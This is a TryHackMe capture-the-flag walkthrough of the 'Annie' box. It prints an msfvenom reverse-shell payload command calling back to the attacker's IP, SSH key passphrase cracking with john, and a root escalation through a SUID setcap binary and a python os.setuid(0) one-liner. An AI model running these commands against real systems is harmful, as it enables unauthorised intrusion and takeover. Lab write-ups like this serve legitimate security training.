Annie TryHackMe Walkthrough
Introduction
Hello guys back again with another walkthrough this time we are going to be tackling Annie from tryhackme a really amazing box by TobjasR. The box is rated as a medium but according to my opinion it can be classified as an easy box since it just has two steps from initial exploitation to getting a root shell on the box. You start of by doing initial recon using nmap and discover that anydesk is running on the system. Find it’s vulnerable to a remote code execution and exploit it to get an initial shell on the box. Then running linpeas you discover that setcap has a SUID bit set. Set malicious capability to python and this spawns a root shell on the box. Am not sure if the root part that i used is intended but I’ll wait for other people writeups and then update the article. Without much say let’s jump in
As always we begin with an nmap scan of the box to discover the ports that are open and looking at the result below we see that four ports are open
The port that looked interesting to me was anydesk running on port 7070. The way I was able to identify that it was anydesk was due to the certificate information leaked.
Also the SSH server that is running is vulnerable to a user enumeration attack. But I did not to want to start going the SSH exploitation route unless I hit a dead end. Knowing port 7070 was running AnyDesk I went online to google for exploit.
The first result I got on google was a remote code execution for AnyDesk
Since I did not find the exact version of anydesk that was running i decided to run the exploit blindly and hope that it would work. So i copied the exploit to my local machine and edited a couple of this
- IP Address
- Shellcode
Below is the shellcode I generated
The command i used was
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.8.2.58 LPORT=9001 -b "\x00\x25\x26" -f python -v shellcode
Before using the exploit ensure you generate your very own shellcode with the correct IP Address and listening port. Next i did set up a netcat listener on port 9001 since this is the port I had specified on the shellcode I generated
Then ran the exploit. Looking at the screenshot below i got a shell though this was totally a shot in the dark
I decided to upgrade the shell to a full tty
Looking at the user’s home directory we have the user’s flag and we can submit it on TryHackMe and get the point
Looking at the .ssh directory we have a SSH private key I copied it to my machine and tried using it to SSH into the box but i was asked for a passphrase which i did not know
But we can crack the passphrase using john the ripper. First we need to generate a hash that john the ripper can understand and crack. Using the command
ssh2john annie\I was able to generate a hash
I copied the hash to my box and cracked it using john the ripper
I have blurred out the passphrase but if you follow my exact steps you’ll be able to get the passphrase
Now that we have a passphrase we can try and login to the server via SSH. Looking at the screenshot below the login was successful
Now that we have the user flag we can enumerate the box while trying to find a privilege escalation vector. I started by running linpeas
Looking though the output of linpeas we discover an unusal SUID bit binary called setcap
Basically the program allows us to give extended permission to programs. It helps when you want to give a user extended permissions like sending data through raw sockets, Enable and disable kernel auditing etc. The problem is it can be abused and this might lead to privilege escalation on a system. For example if the following capability cap_setuid+ep is given to a python binary it may lead to a privilege escalation. The capability allows for arbitrary manipulations of process UIDs, forges UID when passing socket credentials via UNIX domain sockets and writes a user ID mapping in a user namespace
First we are going to use setcap to give the python binary this capability.
First let’s ensure that python doesn’t have this permissions
Looking at the screenshot above it returns empty.
Let’s copy the binary to our working directory and add those capabilities using the command
cp /usr/bin/python3 /home/annie/python3
setcap cap_setuid+ep /home/annie/python3Looking at the screenshot below when we query the binary we see that it has those extended permissions set
Now we can use the following one liner to get root on the box
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Going to the root folder we get the root flag of the box and the box is pretty much done
Also the box had a voucher. It was a luck for the person who had blood on the box
I hope you enjoyed the walkthrough if so clap for me down below and follow me so that you won’t miss any upcoming walkthrough